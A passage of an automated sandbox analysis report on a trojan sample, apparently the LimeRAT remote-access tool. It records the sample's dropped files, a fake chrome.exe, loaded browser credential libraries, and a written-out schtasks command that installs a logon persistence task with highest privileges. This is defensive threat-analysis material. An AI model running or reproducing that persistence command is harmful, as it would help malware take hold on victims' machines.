                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll8 vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83515401149.0000000005E58000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll8 vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll8 vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80837083048.0000000005E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll8 vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81066992882.0000000005E18000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenss3.dll8 vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81037251638.0000000005E58000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenss3.dll8 vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81072098650.0000000005E58000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll8 vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81035574767.0000000005E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenss3.dll8 vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll8 vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll8 vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenss3.dll8 vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll8 vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80756890980.0000000006411000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll8 vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80741387008.0000000006411000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll8 vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80765987792.0000000005E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll8 vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll8 vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80760169574.0000000005E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll8 vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80768273960.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll8 vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81037950651.0000000005E59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenss3.dll8 vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80844749588.0000000005E58000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exeBinary or memory string: OriginalFilenameMultiRead.EXEB vs DocumentoSENAMHI20222103.exe
                      Source: DocumentoSENAMHI20222103.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\wtqsCpda..exe.log
                      Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@10/16@1/2
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeFile read: C:\Users\user\Desktop\desktop.ini
                      Source: 15.2.wtqsCpda..exe.540000.0.unpack, ??????/??????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                      Source: 15.2.wtqsCpda..exe.540000.0.unpack, ??????/??????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 19.2.chrome.exe.a20000.0.unpack, ??????/??????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                      Source: 19.2.chrome.exe.a20000.0.unpack, ??????/??????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 15.0.wtqsCpda..exe.540000.1.unpack, ??????/??????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                      Source: 15.0.wtqsCpda..exe.540000.1.unpack, ??????/??????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 18.0.chrome.exe.760000.0.unpack, ??????/??????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                      Source: 18.0.chrome.exe.760000.0.unpack, ??????/??????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: chrome.exe.15.dr, ??????/??????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                      Source: chrome.exe.15.dr, ??????/??????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 19.0.chrome.exe.a20000.2.unpack, ??????/??????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                      Source: 19.0.chrome.exe.a20000.2.unpack, ??????/??????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: Chrome[1].exe.1.dr, ??????/??????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                      Source: Chrome[1].exe.1.dr, ??????/??????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 15.0.wtqsCpda..exe.540000.2.unpack, ??????/??????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                      Source: 15.0.wtqsCpda..exe.540000.2.unpack, ??????/??????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 18.2.chrome.exe.760000.0.unpack, ??????/??????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                      Source: 18.2.chrome.exe.760000.0.unpack, ??????/??????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 19.0.chrome.exe.a20000.1.unpack, ??????/??????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                      Source: 19.0.chrome.exe.a20000.1.unpack, ??????/??????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 15.0.wtqsCpda..exe.540000.0.unpack, ??????/??????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                      Source: 15.0.wtqsCpda..exe.540000.0.unpack, ??????/??????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 19.0.chrome.exe.a20000.3.unpack, ??????/??????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                      Source: 19.0.chrome.exe.a20000.3.unpack, ??????/??????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 15.0.wtqsCpda..exe.540000.3.unpack, ??????/??????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                      Source: 15.0.wtqsCpda..exe.540000.3.unpack, ??????/??????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 19.0.chrome.exe.a20000.0.unpack, ??????/??????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                      Source: 19.0.chrome.exe.a20000.0.unpack, ??????/??????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: wtqsCpda..exe.1.dr, ??????/??????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                      Source: wtqsCpda..exe.1.dr, ??????/??????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exeCode function: 1_2_00BD1B39 LoadLibraryExA,LoadLibraryExA,FindResourceA,LoadResource,SizeofResource,FreeLibrary,1_2_00BD1B39
                      Source: DocumentoSENAMHI20222103.exeReversingLabs: Detection: 16%
                      Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe "C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe"
                      Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exeProcess created: C:\Users\user\AppData\Roaming\wtqsCpda..exe "C:\Users\user\AppData\Roaming\wtqsCpda..exe"
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\user\AppData\Local\Temp\chrome.exe'"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\chrome.exe C:\Users\user\AppData\Local\Temp\chrome.exe
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeProcess created: C:\Users\user\AppData\Local\Temp\chrome.exe "C:\Users\user\AppData\Local\Temp\chrome.exe"
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\user\AppData\Local\Temp\chrome.exe'"
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeProcess created: C:\Users\user\AppData\Local\Temp\chrome.exe "C:\Users\user\AppData\Local\Temp\chrome.exe"
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
